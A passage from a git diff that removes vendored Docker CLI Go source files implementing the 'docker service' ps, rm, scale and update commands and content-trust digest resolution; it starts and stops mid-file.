serviceID string - quiet bool - noResolve bool - noTrunc bool - filter opts.FilterOpt -} - -func newPsCommand(dockerCli *command.DockerCli) *cobra.Command { - opts := psOptions{filter: opts.NewFilterOpt()} - - cmd := &cobra.Command{ - Use: "ps [OPTIONS] SERVICE", - Short: "List the tasks of a service", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - opts.serviceID = args[0] - return runPS(dockerCli, opts) - }, - } - flags := cmd.Flags() - flags.BoolVarP(&opts.quiet, "quiet", "q", false, "Only display task IDs") - flags.BoolVar(&opts.noTrunc, "no-trunc", false, "Do not truncate output") - flags.BoolVar(&opts.noResolve, "no-resolve", false, "Do not map IDs to Names") - flags.VarP(&opts.filter, "filter", "f", "Filter output based on conditions provided") - - return cmd -} - -func runPS(dockerCli *command.DockerCli, opts psOptions) error { - client := dockerCli.Client() - ctx := context.Background() - - service, _, err := client.ServiceInspectWithRaw(ctx, opts.serviceID) - if err != nil { - return err - } - - filter := opts.filter.Value() - filter.Add("service", service.ID) - if filter.Include("node") { - nodeFilters := filter.Get("node") - for _, nodeFilter := range nodeFilters { - nodeReference, err := node.Reference(ctx, client, nodeFilter) - if err != nil { - return err - } - filter.Del("node", nodeFilter) - filter.Add("node", nodeReference) - } - } - - tasks, err := client.TaskList(ctx, types.TaskListOptions{Filters: filter}) - if err != nil { - return err - } - - if opts.quiet { - return task.PrintQuiet(dockerCli, tasks) - } - return task.Print(dockerCli, ctx, tasks, idresolver.New(client, opts.noResolve), opts.noTrunc) -} diff --git a/vendor/github.com/docker/docker/cli/command/service/remove.go b/vendor/github.com/docker/docker/cli/command/service/remove.go deleted file mode 100644 index c3fbbabbca..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/remove.go +++ /dev/null @@ -1,47 +0,0 @@ -package service - 
-import ( - "fmt" - "strings" - - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" - "golang.org/x/net/context" -) - -func newRemoveCommand(dockerCli *command.DockerCli) *cobra.Command { - - cmd := &cobra.Command{ - Use: "rm SERVICE [SERVICE...]", - Aliases: []string{"remove"}, - Short: "Remove one or more services", - Args: cli.RequiresMinArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - return runRemove(dockerCli, args) - }, - } - cmd.Flags() - - return cmd -} - -func runRemove(dockerCli *command.DockerCli, sids []string) error { - client := dockerCli.Client() - - ctx := context.Background() - - var errs []string - for _, sid := range sids { - err := client.ServiceRemove(ctx, sid) - if err != nil { - errs = append(errs, err.Error()) - continue - } - fmt.Fprintf(dockerCli.Out(), "%s\n", sid) - } - if len(errs) > 0 { - return fmt.Errorf(strings.Join(errs, "\n")) - } - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/service/scale.go b/vendor/github.com/docker/docker/cli/command/service/scale.go deleted file mode 100644 index cf89e90273..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/scale.go +++ /dev/null @@ -1,96 +0,0 @@ -package service - -import ( - "fmt" - "strconv" - "strings" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/spf13/cobra" -) - -func newScaleCommand(dockerCli *command.DockerCli) *cobra.Command { - return &cobra.Command{ - Use: "scale SERVICE=REPLICAS [SERVICE=REPLICAS...]", - Short: "Scale one or multiple replicated services", - Args: scaleArgs, - RunE: func(cmd *cobra.Command, args []string) error { - return runScale(dockerCli, args) - }, - } -} - -func scaleArgs(cmd *cobra.Command, args []string) error { - if err := cli.RequiresMinArgs(1)(cmd, args); err != nil { - return err - } - for _, arg := range args { - if parts := 
strings.SplitN(arg, "=", 2); len(parts) != 2 { - return fmt.Errorf( - "Invalid scale specifier '%s'.\nSee '%s --help'.\n\nUsage: %s\n\n%s", - arg, - cmd.CommandPath(), - cmd.UseLine(), - cmd.Short, - ) - } - } - return nil -} - -func runScale(dockerCli *command.DockerCli, args []string) error { - var errors []string - for _, arg := range args { - parts := strings.SplitN(arg, "=", 2) - serviceID, scaleStr := parts[0], parts[1] - - // validate input arg scale number - scale, err := strconv.ParseUint(scaleStr, 10, 64) - if err != nil { - errors = append(errors, fmt.Sprintf("%s: invalid replicas value %s: %v", serviceID, scaleStr, err)) - continue - } - - if err := runServiceScale(dockerCli, serviceID, scale); err != nil { - errors = append(errors, fmt.Sprintf("%s: %v", serviceID, err)) - } - } - - if len(errors) == 0 { - return nil - } - return fmt.Errorf(strings.Join(errors, "\n")) -} - -func runServiceScale(dockerCli *command.DockerCli, serviceID string, scale uint64) error { - client := dockerCli.Client() - ctx := context.Background() - - service, _, err := client.ServiceInspectWithRaw(ctx, serviceID) - if err != nil { - return err - } - - serviceMode := &service.Spec.Mode - if serviceMode.Replicated == nil { - return fmt.Errorf("scale can only be used with replicated mode") - } - - serviceMode.Replicated.Replicas = &scale - - response, err := client.ServiceUpdate(ctx, service.ID, service.Version, service.Spec, types.ServiceUpdateOptions{}) - if err != nil { - return err - } - - for _, warning := range response.Warnings { - fmt.Fprintln(dockerCli.Err(), warning) - } - - fmt.Fprintf(dockerCli.Out(), "%s scaled to %d\n", serviceID, scale) - return nil -} diff --git a/vendor/github.com/docker/docker/cli/command/service/trust.go b/vendor/github.com/docker/docker/cli/command/service/trust.go deleted file mode 100644 index 052d49c32a..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/trust.go +++ /dev/null @@ -1,96 +0,0 @@ -package service - -import ( 
- "encoding/hex" - "fmt" - - "github.com/Sirupsen/logrus" - "github.com/docker/distribution/digest" - distreference "github.com/docker/distribution/reference" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/cli/trust" - "github.com/docker/docker/reference" - "github.com/docker/docker/registry" - "github.com/docker/notary/tuf/data" - "github.com/pkg/errors" - "golang.org/x/net/context" -) - -func resolveServiceImageDigest(dockerCli *command.DockerCli, service *swarm.ServiceSpec) error { - if !command.IsTrusted() { - // Digests are resolved by the daemon when not using content - // trust. - return nil - } - - image := service.TaskTemplate.ContainerSpec.Image - - // We only attempt to resolve the digest if the reference - // could be parsed as a digest reference. Specifying an image ID - // is valid but not resolvable. There is no warning message for - // an image ID because it's valid to use one. - if _, err := digest.ParseDigest(image); err == nil { - return nil - } - - ref, err := reference.ParseNamed(image) - if err != nil { - return fmt.Errorf("Could not parse image reference %s", service.TaskTemplate.ContainerSpec.Image) - } - if _, ok := ref.(reference.Canonical); !ok { - ref = reference.WithDefaultTag(ref) - - taggedRef, ok := ref.(reference.NamedTagged) - if !ok { - // This should never happen because a reference either - // has a digest, or WithDefaultTag would give it a tag. 
- return errors.New("Failed to resolve image digest using content trust: reference is missing a tag") - } - - resolvedImage, err := trustedResolveDigest(context.Background(), dockerCli, taggedRef) - if err != nil { - return fmt.Errorf("Failed to resolve image digest using content trust: %v", err) - } - logrus.Debugf("resolved image tag to %s using content trust", resolvedImage.String()) - service.TaskTemplate.ContainerSpec.Image = resolvedImage.String() - } - return nil -} - -func trustedResolveDigest(ctx context.Context, cli *command.DockerCli, ref reference.NamedTagged) (distreference.Canonical, error) { - repoInfo, err := registry.ParseRepositoryInfo(ref) - if err != nil { - return nil, err - } - - authConfig := command.ResolveAuthConfig(ctx, cli, repoInfo.Index) - - notaryRepo, err := trust.GetNotaryRepository(cli, repoInfo, authConfig, "pull") - if err != nil { - return nil, errors.Wrap(err, "error establishing connection to trust repository") - } - - t, err := notaryRepo.GetTargetByName(ref.Tag(), trust.ReleasesRole, data.CanonicalTargetsRole) - if err != nil { - return nil, trust.NotaryError(repoInfo.FullName(), err) - } - // Only get the tag if it's in the top level targets role or the releases delegation role - // ignore it if it's in any other delegation roles - if t.Role != trust.ReleasesRole && t.Role != data.CanonicalTargetsRole { - return nil, trust.NotaryError(repoInfo.FullName(), fmt.Errorf("No trust data for %s", ref.String())) - } - - logrus.Debugf("retrieving target for %s role\n", t.Role) - h, ok := t.Hashes["sha256"] - if !ok { - return nil, errors.New("no valid hash, expecting sha256") - } - - dgst := digest.NewDigestFromHex("sha256", hex.EncodeToString(h)) - - // Using distribution reference package to make sure that adding a - // digest does not erase the tag. When the two reference packages - // are unified, this will no longer be an issue. 
- return distreference.WithDigest(ref, dgst) -} diff --git a/vendor/github.com/docker/docker/cli/command/service/update.go b/vendor/github.com/docker/docker/cli/command/service/update.go deleted file mode 100644 index d56de10913..0000000000 --- a/vendor/github.com/docker/docker/cli/command/service/update.go +++ /dev/null @@ -1,849 +0,0 @@ -package service - -import ( - "fmt" - "sort" - "strings" - "time" - - "golang.org/x/net/context" - - "github.com/docker/docker/api/types" - "github.com/docker/docker/api/types/container" - mounttypes "github.com/docker/docker/api/types/mount" - "github.com/docker/docker/api/types/swarm" - "github.com/docker/docker/cli" - "github.com/docker/docker/cli/command" - "github.com/docker/docker/client" - "github.com/docker/docker/opts" - runconfigopts "github.com/docker/docker/runconfig/opts" - "github.com/docker/go-connections/nat" - shlex "github.com/flynn-archive/go-shlex" - "github.com/spf13/cobra" - "github.com/spf13/pflag" -) - -func newUpdateCommand(dockerCli *command.DockerCli) *cobra.Command { - serviceOpts := newServiceOptions() - - cmd := &cobra.Command{ - Use: "update [OPTIONS] SERVICE", - Short: "Update a service", - Args: cli.ExactArgs(1), - RunE: func(cmd *cobra.Command, args []string) error { - return runUpdate(dockerCli, cmd.Flags(), args[0]) - }, - } - - flags := cmd.Flags() - flags.String("image", "", "Service image tag") - flags.String("args", "", "Service command args") - flags.Bool("rollback", false, "Rollback to previous specification") - flags.Bool("force", false, "Force update even if no changes require it") - addServiceFlags(cmd, serviceOpts) - - flags.Var(newListOptsVar(), flagEnvRemove, "Remove an environment variable") - flags.Var(newListOptsVar(), flagGroupRemove, "Remove a previously added supplementary user group from the container") - flags.Var(newListOptsVar(), flagLabelRemove, "Remove a label by its key") - flags.Var(newListOptsVar(), flagContainerLabelRemove, "Remove a container label by its key") - 
flags.Var(newListOptsVar(), flagMountRemove, "Remove a mount by its target path") - // flags.Var(newListOptsVar().WithValidator(validatePublishRemove), flagPublishRemove, "Remove a published port by its target port") - flags.Var(&opts.PortOpt{}, flagPublishRemove, "Remove a published port by its target port") - flags.Var(newListOptsVar(), flagConstraintRemove, "Remove a constraint") - flags.Var(newListOptsVar(), flagDNSRemove, "Remove a custom DNS server") - flags.Var(newListOptsVar(), flagDNSOptionRemove, "Remove a DNS option") - flags.Var(newListOptsVar(), flagDNSSearchRemove, "Remove a DNS search domain") - flags.Var(newListOptsVar(), flagHostRemove, "Remove a custom host-to-IP mapping (host:ip)") - flags.Var(&serviceOpts.labels, flagLabelAdd, "Add or update a service label") - flags.Var(&serviceOpts.containerLabels, flagContainerLabelAdd, "Add or update a container label") - flags.Var(&serviceOpts.env, flagEnvAdd, "Add or update an environment variable") - flags.Var(newListOptsVar(), flagSecretRemove, "Remove a secret") - flags.Var(&serviceOpts.secrets, flagSecretAdd, "Add or update a secret on a service") - flags.Var(&serviceOpts.mounts, flagMountAdd, "Add or update a mount on a service") - flags.Var(&serviceOpts.constraints, flagConstraintAdd, "Add or update a placement constraint") - flags.Var(&serviceOpts.endpoint.publishPorts, flagPublishAdd, "Add or update a published port") - flags.Var(&serviceOpts.groups, flagGroupAdd, "Add an additional supplementary user group to the container") - flags.Var(&serviceOpts.dns, flagDNSAdd, "Add or update a custom DNS server") - flags.Var(&serviceOpts.dnsOption, flagDNSOptionAdd, "Add or update a DNS option") - flags.Var(&serviceOpts.dnsSearch, flagDNSSearchAdd, "Add or update a custom DNS search domain") - flags.Var(&serviceOpts.hosts, flagHostAdd, "Add or update a custom host-to-IP mapping (host:ip)") - - return cmd -} - -func newListOptsVar() *opts.ListOpts { - return opts.NewListOptsRef(&[]string{}, nil) -} - -func 
runUpdate(dockerCli *command.DockerCli, flags *pflag.FlagSet, serviceID string) error { - apiClient := dockerCli.Client() - ctx := context.Background() - updateOpts := types.ServiceUpdateOptions{} - - service, _, err := apiClient.ServiceInspectWithRaw(ctx, serviceID) - if err != nil { - return err - } - - rollback, err := flags.GetBool("rollback") - if err != nil { - return err - } - - spec := &service.Spec - if rollback { - spec = service.PreviousSpec - if spec == nil { - return fmt.Errorf("service does not have a previous specification to roll back to") - } - } - - err = updateService(flags, spec) - if err != nil { - return err - } - - if flags.Changed("image") { - if err := resolveServiceImageDigest(dockerCli, spec); err != nil { - return err - } - } - - updatedSecrets, err := getUpdatedSecrets(apiClient, flags, spec.TaskTemplate.ContainerSpec.Secrets) - if err != nil { - return err - } - - spec.TaskTemplate.ContainerSpec.Secrets = updatedSecrets - - // only send auth if flag was set - sendAuth, err := flags.GetBool(flagRegistryAuth) - if err != nil { - return err - } - if sendAuth { - // Retrieve encoded auth token from the image reference - // This would be the old image if it didn't change in this update - image := spec.TaskTemplate.ContainerSpec.Image - encodedAuth, err := command.RetrieveAuthTokenFromImage(ctx, dockerCli, image) - if err != nil { - return err - } - updateOpts.EncodedRegistryAuth = encodedAuth - } else if rollback { - updateOpts.RegistryAuthFrom = types.RegistryAuthFromPreviousSpec - } else { - updateOpts.RegistryAuthFrom = types.RegistryAuthFromSpec - } - - response, err := apiClient.ServiceUpdate(ctx, service.ID, service.Version, *spec, updateOpts) - if err != nil { - return err - } - - for _, warning := range response.Warnings { - fmt.Fprintln(dockerCli.Err(), warning) - } - - fmt.Fprintf(dockerCli.Out(), "%s\n", serviceID) - return nil -} - -func updateService(flags *pflag.FlagSet, spec *swarm.ServiceSpec) error { - updateString := 
func(flag string, field *string) { - if flags.Changed(flag) { - *field, _ = flags.GetString(flag) - } - } - - updateInt64Value := func(flag string, field *int64) { - if flags.Changed(flag) { - *field = flags.Lookup(flag).Value.(int64Value).Value() - } - } - - updateFloatValue := func(flag string, field *float32) { - if flags.Changed(flag) { - *field = flags.Lookup(flag).Value.(*floatValue).Value() - } - } - - updateDuration := func(flag string, field *time.Duration) { - if flags.Changed(flag) { - *field, _ = flags.GetDuration(flag) - } - } - - updateDurationOpt := func(flag string, field **time.Duration) { - if flags.Changed(flag) { - val := *flags.Lookup(flag).Value.(*DurationOpt).Value() - *field = &val - } - } - - updateUint64 := func(flag string, field *uint64) { - if flags.Changed(flag) { - *field, _ = flags.GetUint64(flag) - } - } - - updateUint64Opt := func(flag string, field **uint64) { - if flags.Changed(flag) { - val := *flags.Lookup(flag).Value.(*Uint64Opt).Value() - *field = &val - } - } - - cspec := &spec.TaskTemplate.ContainerSpec - task := &spec.TaskTemplate - - taskResources := func() *swarm.ResourceRequirements { - if task.Resources == nil { - task.Resources = &swarm.ResourceRequirements{} - } - return task.Resources - } - - updateLabels(flags, &spec.Labels) - updateContainerLabels(flags, &cspec.Labels) - updateString("image", &cspec.Image) - updateStringToSlice(flags, "args", &cspec.Args) - updateEnvironment(flags, &cspec.Env) - updateString(flagWorkdir, &cspec.Dir) - updateString(flagUser, &cspec.User) - updateString(flagHostname, &cspec.Hostname) - if err := updateMounts(flags, &cspec.Mounts); err != nil { - return err - } - - if flags.Changed(flagLimitCPU) || flags.Changed(flagLimitMemory) { - taskResources().Limits = &swarm.Resources{} - updateInt64Value(flagLimitCPU, &task.Resources.Limits.NanoCPUs) - updateInt64Value(flagLimitMemory, &task.Resources.Limits.MemoryBytes) - } - if flags.Changed(flagReserveCPU) || 
flags.Changed(flagReserveMemory) { - taskResources().Reservations = &swarm.Resources{} - updateInt64Value(flagReserveCPU, &task.Resources.Reservations.NanoCPUs) - updateInt64Value(flagReserveMemory, &task.Resources.Reservations.MemoryBytes) - } - - updateDurationOpt(flagStopGracePeriod, &cspec.StopGracePeriod) - - if anyChanged(flags, flagRestartCondition, flagRestartDelay, flagRestartMaxAttempts, flagRestartWindow) { - if task.RestartPolicy == nil { - task.RestartPolicy = &swarm.RestartPolicy{} - } - - if flags.Changed(flagRestartCondition) { - value, _ := flags.GetString(flagRestartCondition) - task.RestartPolicy.Condition = swarm.RestartPolicyCondition(value) - } - updateDurationOpt(flagRestartDelay, &task.RestartPolicy.Delay) - updateUint64Opt(flagRestartMaxAttempts, &task.RestartPolicy.MaxAttempts) - updateDurationOpt(flagRestartWindow, &task.RestartPolicy.Window) - } - - if anyChanged(flags, flagConstraintAdd, flagConstraintRemove) { - if task.Placement == nil { - task.Placement = &swarm.Placement{} - } - updatePlacement(flags, task.Placement) - } - - if err := updateReplicas(flags, &spec.Mode); err != nil { - return err - } - - if anyChanged(flags, flagUpdateParallelism, flagUpdateDelay, flagUpdateMonitor, flagUpdateFailureAction, flagUpdateMaxFailureRatio) { - if spec.UpdateConfig == nil { - spec.UpdateConfig = &swarm.UpdateConfig{} - } - updateUint64(flagUpdateParallelism, &spec.UpdateConfig.Parallelism) - updateDuration(flagUpdateDelay, &spec.UpdateConfig.Delay) - updateDuration(flagUpdateMonitor, &spec.UpdateConfig.Monitor) - updateString(flagUpdateFailureAction, &spec.UpdateConfig.FailureAction) - updateFloatValue(flagUpdateMaxFailureRatio, &spec.UpdateConfig.MaxFailureRatio) - } - - if flags.Changed(flagEndpointMode) { - value, _ := flags.GetString(flagEndpointMode) - if spec.EndpointSpec == nil { - spec.EndpointSpec = &swarm.EndpointSpec{} - } - spec.EndpointSpec.Mode = swarm.ResolutionMode(value) - } - - if anyChanged(flags, flagGroupAdd, 
flagGroupRemove) { - if err := updateGroups(flags, &cspec.Groups); err != nil { - return err - } - } - - if anyChanged(flags, flagPublishAdd, flagPublishRemove) { - if spec.EndpointSpec == nil { - spec.EndpointSpec = &swarm.EndpointSpec{} - } - if err := updatePorts(flags, &spec.EndpointSpec.Ports); err != nil { - return err - } - } - - if anyChanged(flags, flagDNSAdd, flagDNSRemove, flagDNSOptionAdd, flagDNSOptionRemove, flagDNSSearchAdd, flagDNSSearchRemove) { - if cspec.DNSConfig == nil { - cspec.DNSConfig = &swarm.DNSConfig{} - } - if err := updateDNSConfig(flags, &cspec.DNSConfig); err != nil { - return err - } - } - - if anyChanged(flags, flagHostAdd, flagHostRemove) { - if err := updateHosts(flags, &cspec.Hosts); err != nil { - return err - } - } - - if err := updateLogDriver(flags, &spec.TaskTemplate); err != nil { - return err - } - - force, err := flags.GetBool("force") - if err != nil { - return err - } - - if force { - spec.TaskTemplate.ForceUpdate++ - } - - if err := updateHealthcheck(flags, cspec); err != nil { - return err - } - - if flags.Changed(flagTTY) { - tty, err := flags.GetBool(flagTTY) - if err != nil { - return err - } - cspec.TTY = tty - } - - return nil -} - -func updateStringToSlice(flags *pflag.FlagSet, flag string, field *[]string) error { - if !flags.Changed(flag) { - return nil - } - - value, _ := flags.GetString(flag) - valueSlice, err := shlex.Split(value) - *field = valueSlice - return err -} - -func anyChanged(flags *pflag.FlagSet, fields ...string) bool { - for _, flag := range fields { - if flags.Changed(flag) { - return true - } - } - return false -} - -func updatePlacement(flags *pflag.FlagSet, placement *swarm.Placement) { - if flags.Changed(flagConstraintAdd) { - values := flags.Lookup(flagConstraintAdd).Value.(*opts.ListOpts).GetAll() - placement.Constraints = append(placement.Constraints, values...) 
- } - toRemove := buildToRemoveSet(flags, flagConstraintRemove) - - newConstraints := []string{} - for _, constraint := range placement.Constraints { - if _, exists := toRemove[constraint]; !exists { - newConstraints = append(newConstraints, constraint) - } - } - // Sort so that result is predictable. - sort.Strings(newConstraints) - - placement.Constraints = newConstraints -} - -func updateContainerLabels(flags *pflag.FlagSet, field *map[string]string) { - if flags.Changed(flagContainerLabelAdd) { - if *field == nil { - *field = map[string]string{} - } - - values := flags.Lookup(flagContainerLabelAdd).Value.(*opts.ListOpts).GetAll() - for key, value := range runconfigopts.ConvertKVStringsToMap(values) { - (*field)[key] = value - } - } - - if *field != nil && flags.Changed(flagContainerLabelRemove) { - toRemove := flags.Lookup(flagContainerLabelRemove).Value.(*opts.ListOpts).GetAll() - for _, label := range toRemove { - delete(*field, label) - } - } -} - -func updateLabels(flags *pflag.FlagSet, field *map[string]string) { - if flags.Changed(flagLabelAdd) { - if *field == nil { - *field = map[string]string{} - } - - values := flags.Lookup(flagLabelAdd).Value.(*opts.ListOpts).GetAll() - for key, value := range runconfigopts.ConvertKVStringsToMap(values) { - (*field)[key] = value - } - } - - if *field != nil && flags.Changed(flagLabelRemove) { - toRemove := flags.Lookup(flagLabelRemove).Value.(*opts.ListOpts).GetAll() - for _, label := range toRemove { - delete(*field, label) - } - } -} - -func updateEnvironment(flags *pflag.FlagSet, field *[]string) { - envSet := map[string]string{} - for _, v := range *field { - envSet[envKey(v)] = v - } - if flags.Changed(flagEnvAdd) { - value := flags.Lookup(flagEnvAdd).Value.(*opts.ListOpts) - for _, v := range value.GetAll() { - envSet[envKey(v)] = v - } - } - - *field = []string{} - for _, v := range envSet { - *field = append(*field, v) - } - - toRemove := buildToRemoveSet(flags, flagEnvRemove) - *field = removeItems(*field, 
toRemove, envKey) -} - -func getUpdatedSecrets(apiClient client.SecretAPIClient, flags *pflag.FlagSet, secrets []*swarm.SecretReference) ([]*swarm.SecretReference, error) { - if flags.Changed(flagSecretAdd) { - values := flags.Lookup(flagSecretAdd).Value.(*opts.SecretOpt).Value() - - addSecrets, err := ParseSecrets(apiClient, values) - if err != nil { - return nil, err - } - secrets = append(secrets, addSecrets...) - } - toRemove := buildToRemoveSet(flags, flagSecretRemove) - newSecrets := []*swarm.SecretReference{} - for _, secret := range secrets { - if _, exists := toRemove[secret.SecretName]; !exists { - newSecrets = append(newSecrets, secret) - } - } - - return newSecrets, nil -} - -func envKey(value string) string { - kv := strings.SplitN(value, "=", 2) - return kv[0] -} - -func itemKey(value string) string { - return value -} - -func buildToRemoveSet(flags *pflag.FlagSet, flag string) map[string]struct{} { - var empty struct{} - toRemove := make(map[string]struct{}) - - if !flags.Changed(flag) { - return toRemove - } - - toRemoveSlice := flags.Lookup(flag).Value.(*opts.ListOpts).GetAll() - for _, key := range toRemoveSlice { - toRemove[key] = empty - } - return toRemove -} - -func removeItems( - seq []string, - toRemove map[string]struct{}, - keyFunc func(string) string, -) []string { - newSeq := []string{} - for _, item := range seq { - if _, exists := toRemove[keyFunc(item)]; !exists { - newSeq = append(newSeq, item) - } - } - return newSeq -} - -type byMountSource []mounttypes.Mount - -func (m byMountSource) Len() int { return len(m) } -func (m byMountSource) Swap(i, j int) { m[i], m[j] = m[j], m[i] } -func (m byMountSource) Less(i, j int) bool { - a, b := m[i], m[j] - - if a.Source == b.Source { - return a.Target < b.Target - } - - return a.Source < b.Source -} - -func updateMounts(flags *pflag.FlagSet, mounts *[]mounttypes.Mount) error { - - mountsByTarget := map[string]mounttypes.Mount{} - - if flags.Changed(flagMountAdd) { - values := 
flags.Lookup(flagMountAdd).Value.(*opts.MountOpt).Value() - for _, mount := range values { - if _, ok := mountsByTarget[mount.Target]; ok { - return fmt.Errorf("duplicate mount target") - } - mountsByTarget[mount.Target] = mount - } - } - - // Add old list of mount points minus updated one. - for _, mount := range *mounts { - if _, ok := mountsByTarget[mount.Target]; !ok { - mountsByTarget[mount.Target] = mount - } - } - - newMounts := []mounttypes.Mount{} - - toRemove := buildToRemoveSet(flags, flagMountRemove) - - for _, mount := range mountsByTarget { - if _, exists := toRemove[mount.Target]; !exists { - newMounts = append(newMounts, mount) - } - } - sort.Sort(byMountSource(newMounts)) - *mounts = newMounts - return nil -} - -func updateGroups(flags *pflag.FlagSet, groups *[]string) error { - if flags.Changed(flagGroupAdd) { - values := flags.Lookup(flagGroupAdd).Value.(*opts.ListOpts).GetAll() - *groups = append(*groups, values...) - } - toRemove := buildToRemoveSet(flags, flagGroupRemove) - - newGroups := []string{} - for _, group := range *groups { - if _, exists := toRemove[group]; !exists { - newGroups = append(newGroups, group) - } - } - // Sort so that result is predictable. - sort.Strings(newGroups) - - *groups = newGroups - return nil -} - -func removeDuplicates(entries []string) []string { - hit := map[string]bool{} - newEntries := []string{} - for _, v := range entries { - if !hit[v] { - newEntries = append(newEntries, v) - hit[v] = true - } - } - return newEntries -} - -func updateDNSConfig(flags *pflag.FlagSet, config **swarm.DNSConfig) error { - newConfig := &swarm.DNSConfig{} - - nameservers := (*config).Nameservers - if flags.Changed(flagDNSAdd) { - values := flags.Lookup(flagDNSAdd).Value.(*opts.ListOpts).GetAll() - nameservers = append(nameservers, values...) 
- } - nameservers = removeDuplicates(nameservers) - toRemove := buildToRemoveSet(flags, flagDNSRemove) - for _, nameserver := range nameservers { - if _, exists := toRemove[nameserver]; !exists { - newConfig.Nameservers = append(newConfig.Nameservers, nameserver) - - } - } - // Sort so that result is predictable. - sort.Strings(newConfig.Nameservers) - - search := (*config).Search - if flags.Changed(flagDNSSearchAdd) { - values := flags.Lookup(flagDNSSearchAdd).Value.(*opts.ListOpts).GetAll() - search = append(search, values...) - } - search = removeDuplicates(search) - toRemove = buildToRemoveSet(flags, flagDNSSearchRemove) - for _, entry := range search { - if _, exists := toRemove[entry]; !exists { - newConfig.Search = append(newConfig.Search, entry) - } - } - // Sort so that result is predictable. - sort.Strings(newConfig.Search) - - options := (*config).Options - if flags.Changed(flagDNSOptionAdd) { - values := flags.Lookup(flagDNSOptionAdd).Value.(*opts.ListOpts).GetAll() - options = append(options, values...) - } - options = removeDuplicates(options) - toRemove = buildToRemoveSet(flags, flagDNSOptionRemove) - for _, option := range options { - if _, exists := toRemove[option]; !exists { - newConfig.Options = append(newConfig.Options, option) - } - } - // Sort so that result is predictable. 
- sort.Strings(newConfig.Options) - - *config = newConfig - return nil -} - -type byPortConfig []swarm.PortConfig - -func (r byPortConfig) Len() int { return len(r) } -func (r byPortConfig) Swap(i, j int) { r[i], r[j] = r[j], r[i] } -func (r byPortConfig) Less(i, j int) bool { - // We convert PortConfig into `port/protocol`, e.g., `80/tcp` - // In updatePorts we already filter out with map so there is duplicate entries - return portConfigToString(&r[i]) < portConfigToString(&r[j]) -} - -func portConfigToString(portConfig *swarm.PortConfig) string { - protocol := portConfig.Protocol - mode := portConfig.PublishMode - return fmt.Sprintf("%v:%v/%s/%s", portConfig.PublishedPort, portConfig.TargetPort, protocol, mode) -} - -// FIXME(vdemeester) port to opts.PortOpt -// This validation is only used for `--publish-rm`. -// The `--publish-rm` takes: -// [/] (e.g., 80, 80/tcp, 53/udp) -func validatePublishRemove(val string) (string, error) { - proto, port := nat.SplitProtoPort(val) - if proto != "tcp" && proto != "udp" { - return "", fmt.Errorf("invalid protocol '%s' for %s", proto, val) - } - if strings.Contains(port, ":") { - return "", fmt.Errorf("invalid port format: '%s', should be [/] (e.g., 80, 80/tcp, 53/udp)", port) - } - if _, err := nat.ParsePort(port); err != nil { - return "", err - } - return val, nil -} - -func updatePorts(flags *pflag.FlagSet, portConfig *[]swarm.PortConfig) error { - // The key of the map is `port/protocol`, e.g., `80/tcp` - portSet := map[string]swarm.PortConfig{} - - // Build the current list of portConfig - for _, entry := range *portConfig { - if _, ok := portSet[portConfigToString(&entry)]; !ok { - portSet[portConfigToString(&entry)] = entry - } - } - - newPorts := []swarm.PortConfig{} - - // Clean current ports - toRemove := flags.Lookup(flagPublishRemove).Value.(*opts.PortOpt).Value() -portLoop: - for _, port := range portSet { - for _, pConfig := range toRemove { - if equalProtocol(port.Protocol, pConfig.Protocol) && - 
port.TargetPort == pConfig.TargetPort && - equalPublishMode(port.PublishMode, pConfig.PublishMode) { - continue portLoop - } - } - - newPorts = append(newPorts, port) - } - - // Check to see if there are any conflict in flags. - if flags.Changed(flagPublishAdd) { - ports := flags.Lookup(flagPublishAdd).Value.(*opts.PortOpt).Value() - - for _, port := range ports { - if v, ok := portSet[portConfigToString(&port)]; ok { - if v != port { - fmt.Println("v", v) - return fmt.Errorf("conflicting port mapping between %v:%v/%s and %v:%v/%s", port.PublishedPort, port.TargetPort, port.Protocol, v.PublishedPort, v.TargetPort, v.Protocol) - } - continue - } - //portSet[portConfigToString(&port)] = port - newPorts = append(newPorts, port) - } - } - - // Sort the PortConfig to avoid unnecessary updates - sort.Sort(byPortConfig(newPorts)) - *portConfig = newPorts - return nil -} - -func equalProtocol(prot1, prot2 swarm.PortConfigProtocol) bool { - return prot1 == prot2 || - (prot1 == swarm.PortConfigProtocol("") && prot2 == swarm.PortConfigProtocolTCP) || - (prot2 == swarm.PortConfigProtocol("") && prot1 == swarm.PortConfigProtocolTCP) -} - -func equalPublishMode(mode1, mode2 swarm.PortConfigPublishMode) bool { - return mode1 == mode2 || - (mode1 == swarm.PortConfigPublishMode("") && mode2 == swarm.PortConfigPublishModeIngress) || - (mode2 == swarm.PortConfigPublishMode("") && mode1 == swarm.PortConfigPublishModeIngress) -} - -func equalPort(targetPort nat.Port, port swarm.PortConfig) bool { - return (string(port.Protocol) == targetPort.Proto() && - port.TargetPort == uint32(targetPort.Int())) -} - -func updateReplicas(flags *pflag.FlagSet, serviceMode *swarm.ServiceMode) error { - if !flags.Changed(flagReplicas) { - return nil - } - - if serviceMode == nil || serviceMode.Replicated == nil { - return fmt.Errorf("replicas can only be used with replicated mode") - } - serviceMode.Replicated.Replicas = flags.Lookup(flagReplicas).Value.(*Uint64Opt).Value() - return nil -} - -func 
